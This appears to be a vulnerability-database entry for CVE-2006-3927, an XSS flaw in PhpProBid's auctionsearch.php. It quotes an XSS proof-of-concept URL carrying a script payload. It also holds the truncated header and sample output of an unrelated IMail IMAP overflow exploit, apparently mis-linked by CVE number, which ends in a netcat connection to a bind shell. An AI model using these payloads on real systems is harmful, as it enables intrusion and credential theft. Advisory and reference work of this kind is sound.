CVE-2006-3927
published 2006-07-31CVE-2006-3927: Cross-site scripting (XSS) vulnerability in auctionsearch.php in PhpProBid 5.24 allows remote attackers to inject arbitrary web script or HTML via the advsrc…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.89%
77.0th percentile
Cross-site scripting (XSS) vulnerability in auctionsearch.php in PhpProBid 5.24 allows remote attackers to inject arbitrary web script or HTML via the advsrc parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_pro_bid | php_pro_bid | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow
exploitdb·2007-07-26
CVE-2007-3927 IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow
IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow
---
#!/use/bin/perl
# Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1
# Code by yunshu, our team: www.ph4nt0m.org Mail list: http://list.ph4nt0m.org
#F:\>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass
#* OK IMAP4 Server (IMail 9.10)
#0 OK LOGIN completed
#* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
#* 0 EXISTS
#* 0 RECENT
#* OK [UIDVALIDITY 1185270594] UIDs valid
#* OK [UIDNEXT 485270595] Predicted next UID
#2 OK [READ-WRITE] SELECT completed
#3 OK SUBSCRIBE completed
#Trying..
#Bingle!Maybe get it!
#You can try to telnet 22 port, do you have nc?
#D:\Microsoft Visual Studio 8\VC>nc -vv 192.168.1.2 22
#192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA
#(UNKNOWN) [192.168
Exploit-DB
PHP Pro Bid 5.2.4 - 'auctionsearch.php?advsrc' Cross-Site Scripting
exploitdb·2006-07-25
CVE-2006-3927 PHP Pro Bid 5.2.4 - 'auctionsearch.php?advsrc' Cross-Site Scripting
PHP Pro Bid 5.2.4 - 'auctionsearch.php?advsrc' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/19158/info
PHP Pro Bid is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input.
A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.
Version 5.24 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/auctionsearch.php?advsrc="alert(/EllipsisSecurityTe st/)
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2006-07/0474.htmlhttp://secunia.com/advisories/21201http://securityreason.com/securityalert/1298http://securitytracker.com/id?1016595http://www.osvdb.org/27544http://www.securityfocus.com/bid/19158https://exchange.xforce.ibmcloud.com/vulnerabilities/28030http://archives.neohapsis.com/archives/bugtraq/2006-07/0474.htmlhttp://secunia.com/advisories/21201http://securityreason.com/securityalert/1298http://securitytracker.com/id?1016595http://www.osvdb.org/27544http://www.securityfocus.com/bid/19158https://exchange.xforce.ibmcloud.com/vulnerabilities/28030
2006-07-31
Published